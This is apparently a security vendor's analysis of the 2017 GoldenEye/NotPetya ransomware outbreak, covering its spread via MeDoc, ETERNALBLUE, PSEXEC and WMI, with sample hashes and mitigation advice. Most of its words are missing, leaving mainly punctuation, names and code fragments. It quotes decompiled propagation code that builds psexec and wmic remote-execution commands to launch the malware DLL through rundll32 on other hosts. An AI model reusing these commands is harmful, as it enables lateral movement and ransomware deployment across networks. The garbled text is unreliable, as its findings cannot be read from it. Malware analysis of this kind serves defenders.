27 2017
, GoldenEye, .
, MBR ( Windows) , .
DLL, , , . . , , , , .
, . . , GoldenEye , , .
.
:
• MeDoc —
( )
• ETERNALBLUE: , ,
Microsoft 14 2017 MS17-010.
• PSEXEC: , PSEXEC.
• WMI: , WMI
1: 7e37ab34ecdcc3e77e24522ddfd4852d
. :
• EternalBlue
• PSEXECv8 = wsprintfW(a2, L”%s \\\\%s -accepteula -s “, v3, a3);
v9 = wsprintfW(&a2[v8], L”-d C:\\Windows\\System32\\rundll32.exe \”C:\\Windows\\%s\”,#1 “, &v14)
+ v8;
• WMIwbem\wmic.exe %s /node:”%ws” /user:”%ws” /password:”%ws” process call create “C:\Windows
\System32\ rundll32.exe \”C:\Windows\%s\” #1
2: 71b6a493388e7d0b40c83ce903bc6b04
, — EZVIT, MeDoc,
. GoldenEye :
, -, .
• ,
. ,
, .
• , .
• ETERNALBLUE, , :
technet.microsoft.com/en-us/library/security/ms17-010.aspx• ,
Adaptive Defense Adaptive Defense 360.
• Adaptive Defense, Adaptive Defense Lock: , Panda Security .
• ,
.